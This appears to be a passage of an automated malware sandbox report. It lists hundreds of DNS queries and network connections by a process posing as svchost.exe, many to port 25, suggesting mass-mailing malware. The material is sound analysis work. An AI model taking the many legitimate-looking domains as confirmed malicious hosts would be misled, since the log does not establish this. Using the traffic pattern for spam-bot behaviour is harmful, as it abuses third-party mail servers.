                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.54.214 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.76.64.25 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.92.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.98.236.253 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.12.38 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.86.6.113 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.42.191.38 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.53.77.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.46.30.77 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 127.0.0.11 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.13.20 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cnti.krsn.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.55 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.145.148 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.94.166.30 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.217.118.81 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.224.212.222 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.59 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.41.152 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cyclad.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.31 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.synetik.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.38 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.90.244.158 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.177.67.59 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.165.223.27 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 174.129.25.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 68.71.135.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.185.0.4 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.19.230.145 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.24.177 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.168.185.204 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.201.52.102 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.100.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.18.40.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.15 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.176.155.206 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.3.14 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.246.117.171 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.193.204.92 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.244.106.2 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.220 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hubbikes.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.223 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.148.147 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.196.145 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.216.241.100 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.19.68 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.82.115.227 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.128.23.153 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wkhk.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.181.82.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.225.40.19 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.31.76.90 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.77.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.1.82 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.19.116.195 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.213.117.166 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pb-games.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.169.15.168 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.76.38 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.217.218.26 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.145 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.251.31.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.251.31.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.112.187.75 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.sclover3.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 109.71.54.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adventist.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.232.113 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 78.46.224.133 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akr.co.id
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 97.74.42.79 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.204.18.132 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.177.80.70 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.142.131.159 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.174.22.233 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.79.166 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.151.30.147 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.248.94.67 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.111.255.201 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.120 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.8.75 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.reglera.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.usadig.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.90.232.24 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.163.173 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: at-shun.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.177.56 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anduran.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.64.150.164 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kursavto.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.205.70.128 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.4.16.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
